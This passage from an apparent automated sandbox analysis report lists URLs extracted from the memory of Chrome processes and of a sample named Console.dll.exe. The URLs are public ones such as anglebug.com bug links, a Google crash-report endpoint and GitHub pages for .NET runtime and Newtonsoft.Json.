            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2553789982.0000179400244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2553789982.0000179400244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2553789982.0000179400244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
            Source: chrome.exe, 00000003.00000002.1739433697.00006EEC00244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625n
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
            Source: chrome.exe, 00000003.00000003.1352219733.000044A4002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1352296337.000044A4002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1742430714.00004034002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1742467049.00004034002EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
            Source: chrome.exe, 00000008.00000002.2551193176.0000023E85508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.comEs
            Source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
            Source: Console.dll.exe, System.Xml.XmlSerializer.dll.0.dr, System.Reflection.Emit.Lightweight.dll.0.dr, System.Buffers.dll.0.dr, System.Runtime.Serialization.dll.0.dr, System.Reflection.TypeExtensions.dll.0.dr, System.Dynamic.Runtime.dll.0.dr, System.ComponentModel.Primitives.dll.0.dr, System.Diagnostics.Tracing.dll.0.dr, System.Threading.Tasks.Parallel.dll.0.dr, System.Diagnostics.TextWriterTraceListener.dll.0.dr, System.Text.Encodings.Web.dll.0.dr, System.IO.Compression.ZipFile.dll.0.dr, System.Runtime.Serialization.Primitives.dll.0.dr, System.Runtime.InteropServices.RuntimeInformation.dll.0.dr, System.Runtime.InteropServices.dll.0.dr, System.Security.Cryptography.ProtectedData.dll.0.dr, System.Configuration.dll.0.dr, System.Security.Cryptography.Algorithms.dll.0.dr, System.Resources.ResourceManager.dll.0.dr, System.Threading.dll.0.drString found in binary or memory: https://github.com/dotnet/runtime
            Source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
            Source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50821
            Source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
            Source: System.Dynamic.Runtime.dll.0.drString found in binary or memory: https://github.com/dotnet/runtime4
            Source: System.IO.UnmanagedMemoryStream.dll.0.drString found in binary or memory: https://github.com/dotnet/runtime6s
